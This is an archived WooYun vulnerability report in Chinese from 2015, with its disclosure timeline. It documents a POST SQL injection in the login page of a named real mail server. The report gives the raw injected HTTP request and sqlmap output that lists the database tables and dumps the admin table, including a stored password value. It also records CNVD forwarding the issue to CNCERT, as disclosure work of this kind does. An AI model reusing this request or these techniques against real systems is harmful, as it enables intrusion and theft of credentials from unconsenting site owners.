乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-07-21: 细节已通知厂商并且等待厂商处理中 2015-07-24: 厂商已经确认,细节仅向厂商公开 2015-08-03: 细节向核心白帽子及相关领域专家公开 2015-08-13: 细节向普通白帽子公开 2015-08-23: 细节向实习白帽子公开 2015-09-07: 细节向公众公开
http://mail.sd-si.cn/ 抓包看了下,POST注入,跑了下内容。。。
POST /login.php HTTP/1.1Host: mail.sd-si.cnContent-Length: 102Cache-Control: max-age=0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Origin: http://mail.sd-si.cnUser-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.153 Safari/537.36 SE 2.X MetaSr 1.0Content-Type: application/x-www-form-urlencodedReferer: http://mail.sd-si.cn/Accept-Encoding: gzip,deflate,sdchAccept-Language: zh-CN,zh;q=0.8Cookie: LOGIN_KEY=7a64c3753a3c2f5493a5e235af1b8502F_lang=&F_tm=1437355191&F_email=sss%27&F_domain=sd-si.cn&F_password=aaa&F_tpl=&action.x=37&action.y=23
Database: mail[23 tables]+-----------------+| domain || user || admin || alias_domain || blackclient || datadir || domainadm || domainlog || iplog || lastline || mail_log || maillist || maillog || maillog_history || maillog_tmp || mydest || property || sendlog || spamlog || timemail || user_property || userlog || viruslog |+-----------------+[11:45:08] [INFO] fetched data logged to text files under 'C:\Users\k\.sqlmap\otput\mail.sd-si.cn'[*] shutting down at 11:45:08C:\Python27\sqlmap>
[11:48:02] [INFO] the back-end DBMS is MySQLweb application technology: Apacheback-end DBMS: MySQL 5[11:48:02] [INFO] fetching columns for table 'admin' in database 'mail'[11:48:02] [INFO] the SQL query used returns 4 entries[11:48:02] [INFO] resumed: date[11:48:02] [INFO] resumed: datetime[11:48:02] [INFO] resumed: passwd[11:48:02] [INFO] resumed: char(36)[11:48:02] [INFO] resumed: ip[11:48:02] [INFO] resumed: char(32)[11:48:02] [INFO] resumed: spam_admin[11:48:02] [INFO] resumed: char(48)[11:48:02] [INFO] fetching entries for table 'admin' in database 'mail'[11:48:02] [INFO] the SQL query used returns 1 entries[11:48:02] [WARNING] reflective value(s) found and filtering out[11:48:02] [INFO] retrieved: 2010-03-01 16:28:22[11:48:03] [INFO] retrieved:[11:48:03] [INFO] retrieved: VjiwKADmDfG96[11:48:03] [INFO] retrieved: [email protected][11:48:03] [INFO] analyzing table dump for possible password hashesDatabase: mailTable: admin[1 entry]+---------+---------------+---------------------+------------------+| ip | passwd | date | spam_admin |+---------+---------------+---------------------+------------------+| <blank> | VjiwKADmDfG96 | 2010-03-01 16:28:22 | [email protected] |+---------+---------------+---------------------+------------------+[11:48:03] [INFO] table 'mail.admin' dumped to CSV file 'C:\Users\k\.sqlmap\output\mail.sd-si.cn\dump\mail\admin.csv'[11:48:03] [INFO] fetched data logged to text files under 'C:\Users\k\.sqlmap\output\mail.sd-si.cn'[*] shutting down at 11:48:03C:\Python27\sqlmap>
危害等级:中
漏洞Rank:10
确认时间:2015-07-24 15:41
CNVD确认所述情况,转由CNCERT下发给山东分中心,由其后续协调网站管理单位处置.
暂无